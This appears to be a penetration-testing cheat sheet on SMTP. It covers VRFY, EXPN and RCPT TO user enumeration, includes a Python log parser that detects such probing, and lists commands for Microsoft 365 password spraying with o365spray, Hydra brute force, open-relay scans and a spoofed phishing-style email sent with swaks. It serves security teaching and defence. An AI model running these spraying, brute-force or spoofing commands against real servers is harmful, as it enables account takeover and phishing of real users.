SMTP
ABOUT
Simple Mail Transfer Protocol (SMTP) is a protocol for sending emails over an IP network. It is used between an email client and an outgoing mail server, or between two SMTP servers. SMTP is usually combined with IMAP or POP3, which clients use to retrieve emails. In principle it is a client-server protocol. Commonly it uses TCP/25 for unencrypted SMTP, TCP/465 for implicitly encrypted SMTP (SMTPS), and TCP/587 for SMTP submission with STARTTLS encryption.
SMTP Servers
SMTP servers play a crucial role in preventing spam by supporting ESMTP with SMTP-Auth, so that only authorized users can send email. The Mail User Agent (MUA) converts the email into headers and body and uploads it to the SMTP server. A Mail Transfer Agent (MTA) checks the email for size and spam and stores it after validation. Often a Mail Submission Agent (MSA) or relay server validates the email's origin first, to prevent Open Relay attacks. The MTA then looks up the recipient mail server's IP address in DNS.
MUA(Client) -> MSA(Submission Agent) -> MTA(Open Relay) -> MDA(Mail Delivery Agent) -> POP3/IMAP(Mailbox)
SMTP Commands
Connect
To connect to an SMTP server you can usually just use telnet and specify the port.
telnet 13.13.13.13 25
VRFY
The VRFY command asks the SMTP server whether a username is valid. Note that a 252 reply only means the server will accept mail for that name and attempt delivery without confirming the mailbox exists, so it is weaker evidence than a 250.
VRFY root
252 2.0.0 root
EXPN
The EXPN command works like VRFY, but when given a distribution list it returns all members of that list.
EXPN impostors-team
250 2.0.0 john@amogus.com
250 2.1.5 bob@amogus.com
RCPT TO
The RCPT TO command specifies a recipient, and the reply code reveals whether that address exists. Each additional RCPT TO in the same session probes one more user.
RCPT TO:alice
550 5.1.1 alice... User unknown
RCPT TO:bob
250 2.1.5 bob... Recipient ok
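The VRFY, EXPN and RCPT TO probes above leave a clear trace on the receiving server. As an added example (not from the original page), this Python script parses constructed Postfix-style smtpd rejection lines and flags client IPs that probe many distinct unknown recipients within a short window; the log lines, IPs, window and threshold are all constructed or assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in Postfix smtpd style (not taken from the original page).
# 13.13.13.13 (the page's placeholder address) probes five unknown users in seconds;
# 10.0.0.5 is a partner gateway that made a single typo.
SAMPLE_LOG = """\
Mar 14 10:01:02 mail postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[13.13.13.13]: 550 5.1.1 <alice@amogus.com>: Recipient address rejected: User unknown in local recipient table; from=<n@x.io> to=<alice@amogus.com> proto=ESMTP helo=<probe>
Mar 14 10:01:02 mail postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[13.13.13.13]: 550 5.1.1 <carol@amogus.com>: Recipient address rejected: User unknown in local recipient table; from=<n@x.io> to=<carol@amogus.com> proto=ESMTP helo=<probe>
Mar 14 10:01:03 mail postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[13.13.13.13]: 550 5.1.1 <dave@amogus.com>: Recipient address rejected: User unknown in local recipient table; from=<n@x.io> to=<dave@amogus.com> proto=ESMTP helo=<probe>
Mar 14 10:01:03 mail postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[13.13.13.13]: 550 5.1.1 <erin@amogus.com>: Recipient address rejected: User unknown in local recipient table; from=<n@x.io> to=<erin@amogus.com> proto=ESMTP helo=<probe>
Mar 14 10:01:04 mail postfix/smtpd[4242]: NOQUEUE: reject: RCPT from unknown[13.13.13.13]: 550 5.1.1 <frank@amogus.com>: Recipient address rejected: User unknown in local recipient table; from=<n@x.io> to=<frank@amogus.com> proto=ESMTP helo=<probe>
Mar 14 10:05:00 mail postfix/smtpd[4301]: NOQUEUE: reject: RCPT from gw.partner.example[10.0.0.5]: 550 5.1.1 <bob.smth@amogus.com>: Recipient address rejected: User unknown in local recipient table; from=<p@partner.example> to=<bob.smth@amogus.com> proto=ESMTP helo=<gw>
"""

# Matches the "unknown recipient" rejection that RCPT TO probing produces.
REJECT_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*?RCPT from \S*\[(?P<ip>[^\]]+)\]: "
    r"550 5\.1\.1 <(?P<rcpt>[^>]+)>: Recipient address rejected: User unknown"
)

def parse_rejects(log_text):
    """Return {client_ip: [(timestamp, rejected_recipient), ...]}."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if m:
            # syslog stamps carry no year; fine for deltas within one file
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            events[m["ip"]].append((ts, m["rcpt"].lower()))
    return events

def find_enumerators(log_text, window_s=60, threshold=5):
    """Flag IPs that hit >= threshold distinct unknown recipients inside window_s seconds."""
    flagged = {}
    for ip, evs in parse_rejects(log_text).items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            window = timedelta(seconds=window_s)
            distinct = {r for t, r in evs[i:] if t - start <= window}
            if len(distinct) >= threshold:
                flagged[ip] = len(distinct)
                break
    return flagged

if __name__ == "__main__":
    print(find_enumerators(SAMPLE_LOG))  # {'13.13.13.13': 5}
```

On Postfix, disable_vrfy_command = yes removes the VRFY vector (Postfix does not implement EXPN at all), but RCPT TO probing cannot be switched off, only rate-limited and alerted on as above.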
Microsoft 365
This is not a full section on Microsoft 365, but it is a common target, so here are some basic enumeration techniques.
O365spray
O365spray is a tool for username enumeration and password spraying against Microsoft 365.
Validate
python3 o365spray.py --validate --domain amogus.com
Username Enum
python3 o365spray.py --enum -U users.txt --domain amogus.com
Password Spraying
python3 o365spray.py --spray -U users.txt -p '1mp0st3r' --count 1 --lockout 1 --domain amogus.com
Tips2Hack
Nmap - Open Relay
sudo nmap 13.13.13.13 -p25 --script smtp-open-relay -v
Nmap - SMTP all scripts enum
sudo nmap 13.13.13.13 -p25 -sV -sC --script smtp* -v
DIG - Mail Server enum
dig mx amogus.com | grep "MX" | grep -v ";"
Host Mail Server
host -t A mail.amogus.htb
smtp-user-enum script [LINK]
smtp-user-enum -M RCPT -U userlist.txt -D amogus.com -t 13.13.13.13
Hydra - Password attacks
If you know a user, for example "bob", don't use just the bare username; use it with the domain as a full email address, like bob@amogus.com
hydra -L users.txt -p 'amogus' -f 13.13.13.13 pop3
Swaks - Send mail
swaks --from notifications@amogus.com --to impostors@amogus.com --header 'Subject: You have suspected of being impostors' --body 'Hi, our councel of spacemen chose by democratic voting that you are sus, so you have no other choice but to surrender and be ready for empty vastness of space. If you want to deny that, please join our chat here and explain your sus behaviour: https://impostor-chat-court.com' --server 13.13.13.13